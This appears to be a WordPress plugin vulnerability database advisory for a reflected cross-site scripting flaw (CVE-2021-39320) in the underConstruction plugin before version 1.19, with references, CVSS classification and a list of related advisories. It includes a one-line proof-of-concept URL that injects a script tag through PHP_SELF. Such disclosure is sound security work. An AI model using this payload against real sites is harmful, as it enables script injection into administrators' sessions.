WordPress Plugin Vulnerabilities

underConstruction < 1.19 - Reflected Cross-Site Scripting

Description

The plugin does not escape the PHP_SELF before outputting it in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php/"><script>alert(/XSS/)</script>/?page=under-construction

Affects Plugins

Plugin icon
underconstruction
Fixed in 1.19

References

CVE
CVE-2021-39320
URL
https://www.wordfence.com/blog/2021/09/reflected-xss-in-underconstruction-plugin/
URL
https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Ram Gall (Wordfence)
Verified
Yes
WPVDB ID
49ae1df0-d6d2-4cbb-9a9d-bf3599429875

Timeline

Publicly Published
2021-08-31 (about 2 years ago)
Added
2021-08-31 (about 2 years ago)
Last Updated
2023-01-28 (about 10 months ago)

Other

Published
Title
Published
2023-03-22
Title
W4 Post List < 2.4.6 - Reflected XSS
Published
2023-11-07
Title
Edit WooCommerce Templates <= 1.1.1 - Reflected XSS
Published
2023-05-15
Title
WP SMS < 6.1.5 - Reflected XSS
Published
2019-04-30
Title
Share This Image <= 1.19 - Stored XSS
Published
2023-01-20
Title
Social Like Box and Page by WpDevArt < 0.8.40 - Admin+ Stored XSS